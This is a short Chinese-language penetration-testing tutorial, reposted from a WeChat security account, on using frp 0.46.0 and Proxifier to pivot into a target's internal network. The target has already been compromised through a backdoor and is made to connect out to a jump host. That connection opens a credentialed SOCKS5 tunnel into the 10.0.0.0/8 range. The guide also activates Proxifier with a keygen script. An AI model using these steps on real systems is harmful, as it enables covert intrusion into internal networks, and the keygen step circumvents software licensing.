环境介绍
3台设备:本地攻击机、远程跳板机、远程目标服务器
前置操作需要根据目标服务器环境下载对应版本的frp(0.46.0)
下载安装Proxifier并使用工具python Proxifier_Keygen.py -v setup
激活
配置跳板机
跳板机为linux,直接下载并上传linux版本0.46.0的frps
配置frps.ini
[common]
bind_port = 50001
privilege_token = pentest999
tls_only = true
启动服务监听nohup ./frps -c frps.ini >/dev/null 2>&1 &
后台没回显
如果想要关掉
ps -aux|grep frp| grep -v grep
kill -9 PID
配置目标服务器
将windows版本0.46.0的frpc.exe利用后门上传上去,并编写配置文件frpc.ini如下格式
[common]
server_addr = 跳板机ip
server_port = 50001
protocol = tcp
tls_enable = true
privilege_token = pentest999
[plugin_socks5]
type = tcp
remote_port = 8123
plugin = socks5
use_encryption = true
use_compression = true
plugin_user = ptest666
plugin_passwd = ptest666
运行frp连接跳板机frpc.exe -c frpc.ini
配置Proxifier
设置Proxy Sever新增一项
server地址填跳板机地址,端口为frpc.ini中设置的8123,以及用户名和密码都是frpc.ini中设置的ptest666

在Proxification Rules中新增一条规则,即将任意app的目的地址为10.0.0.0/8的流量都指向我们刚才设置的跳板机ip:8123

测试连通性
目标服务器内网存在一个springboot项目,现在就可以直接用本机的浏览器输入内网ip直接访问了

原文始发于微信公众号(智佳网络安全):frp内网穿透环境搭建
版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 举报,一经查实,本站将立刻删除。
文章由极客之音整理,本文链接:https://www.bmabk.com/index.php/post/300749.html